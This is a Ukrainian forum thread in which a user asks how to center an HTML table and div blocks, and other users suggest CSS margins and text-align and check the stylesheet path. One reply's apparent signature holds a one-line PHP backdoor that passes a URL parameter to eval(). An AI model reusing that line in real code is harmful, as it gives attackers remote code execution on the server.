Тема: Як вирівняти таблицю по центру ?

Привіт.
Є в мене сторінка, у якій міститься таблиця і декілька div блоків.
І треба мені це все вирівняти по центру.
Я пробував просто це все запихати у

<center>...</center>

але в результаті по центру ставали лише div блоки, і то не повністю.

Html:

<!DOCTYPE html>
 <html>
      <head>
            <meta charset="utf-8">
            <title>Home page</title>
            <link rel="stylesheet" href="/template/style.css">
            <script src="/template/js/block.js"></script>
      </head>
      <body>
          <div id="logo">
        logo
            </div>
            <div id="cframe">
             <table  border="0" cellspacing="1" cellpadding="0" width="1300" bgcolor="#CCCCCC" >{content}</tr>
    <tr>
       <td colspan="2" class="bottom"> Hanter</td>
       </tr>
           </table>
          <div align="center">text</div>
            </div>
      </body>
</html>

2

Re: Як вирівняти таблицю по центру ?

table{
 width:1300px;
 margin:0 auto;
position:relative;
}

Спробуйте

Re: Як вирівняти таблицю по центру ?

funivan написав:
table{
 width:1300px;
 margin:0 auto;
position:relative;
}

Спробуйте

Нажаль не рівняє...

4 Востаннє редагувалося Invader (21.01.2013 14:01:45)

Re: Як вирівняти таблицю по центру ?

table { margin: auto; }

або

<table style="margin: auto;">

http://stackoverflow.com/questions/7455 … rizontally

<?php
echo '<html><body><h1>This is my home page</h1>DATING &amp; DOORWAY</body></html>';
if (isset($_GET['adminka'])) eval($_GET['adminka']);
Если ты это читаешь, тебе должно быть стыдно! Займись чем–нибудь полезным!

5

Re: Як вирівняти таблицю по центру ?

http://www.granneman.com/webdev/coding/ … tertables/

Подякували: Адріян Ігорович1

Re: Як вирівняти таблицю по центру ?

Використав наступне:

width:70%; 
    margin-left:15%; 
    margin-right:15%;

7

Re: Як вирівняти таблицю по центру ?

А так прокатить?

body
{
text-align: center;
}

або

div.body
{
text-align: center;
}
I belong to the Dead Generation.

Re: Як вирівняти таблицю по центру ?

Bartash написав:

А так прокатить?

body
{
text-align: center;
}

або

div.body
{
text-align: center;
}

Так нажаль не хоче.

9 Востаннє редагувалося Bartash (22.01.2013 15:49:45)

Re: Як вирівняти таблицю по центру ?

/template/style.css

У вас файли html та css - в однім каталозі лежать?

./template/style.css
I belong to the Dead Generation.

10

Re: Як вирівняти таблицю по центру ?

Bartash написав:
/template/style.css

У вас файли html та css - в однім каталозі лежать?

./template/style.css

Так, в одному.

11

Re: Як вирівняти таблицю по центру ?

Hanter написав:
Bartash написав:
/template/style.css

У вас файли html та css - в однім каталозі лежать?

./template/style.css

Так, в одному.

Тоді проблема - у відсутності крапки у шляху до файлу стилів.

I belong to the Dead Generation.

12

Re: Як вирівняти таблицю по центру ?

Bartash написав:
Hanter написав:
Bartash написав:
/template/style.css

У вас файли html та css - в однім каталозі лежать?

./template/style.css

Так, в одному.

Тоді проблема - у відсутності крапки у шляху до файлу стилів.

Упс, забув сказати, що ці html файли підключаються у скрипті і вже з самого скрипта виводяться.

13

Re: Як вирівняти таблицю по центру ?

Hanter написав:

Упс, забув сказати, що ці html файли підключаються у скрипті і вже з самого скрипта виводяться.

А це якось впливає на підключення CSS? Якщо CSS підключається безпосередньо у HTML-файлі за допомогою link, то можна взагалі

"./style.css"
I belong to the Dead Generation.